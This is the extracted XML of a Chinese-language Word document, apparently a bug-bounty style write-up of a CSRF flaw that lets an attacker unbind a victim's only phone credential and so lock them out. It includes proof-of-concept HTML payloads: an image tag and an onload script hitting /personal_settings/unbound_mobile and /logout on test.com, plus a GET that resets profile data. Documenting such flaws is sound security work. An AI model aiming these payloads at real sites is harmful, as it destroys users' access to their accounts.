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csrf注销账号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注册公司时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只需要手机号</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="43624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正常情况下无法解除绑定手机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只有邮箱选项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3667125" cy="895350"/>
            <wp:effectExtent l="0" t="0" r="158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在绑定了邮箱和手机的情况下可以接触绑定手机</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="22453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我们在绑定邮箱后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抓到解除绑定手机的数据包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33975" cy="2305050"/>
            <wp:effectExtent l="0" t="0" r="222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攻击流程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用只绑定了手机的账号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访问/personal_settings/unbound_mobile接口后退出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失去唯一登陆凭证造成账号注销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POC：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&lt;img src=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>://test.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>/personal_settings/unbound_mobile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans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&lt;script&gt;window.onload=function(){window.open(‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>://test.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>logout’)}&lt;/script&gt;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TIPS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有时候绑定双重凭证之后可以发现解除功能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当业务没有验证是否是唯一凭证的时候造成丢失唯一凭证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导致注销账号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62350" cy="2000250"/>
            <wp:effectExtent l="0" t="0" r="190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get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>https://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>test.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>/server/person/changeUserInfo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所有信息重置了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35F3C"/>
    <w:rsid w:val="7FEF9D3C"/>
    <w:rsid w:val="D7F3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2022-06-09T22:00:00Z</dcterms:created>
  <dc:creator>Single</dc:creator>
  <cp:lastModifiedBy>Single</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-20T16:40:14Z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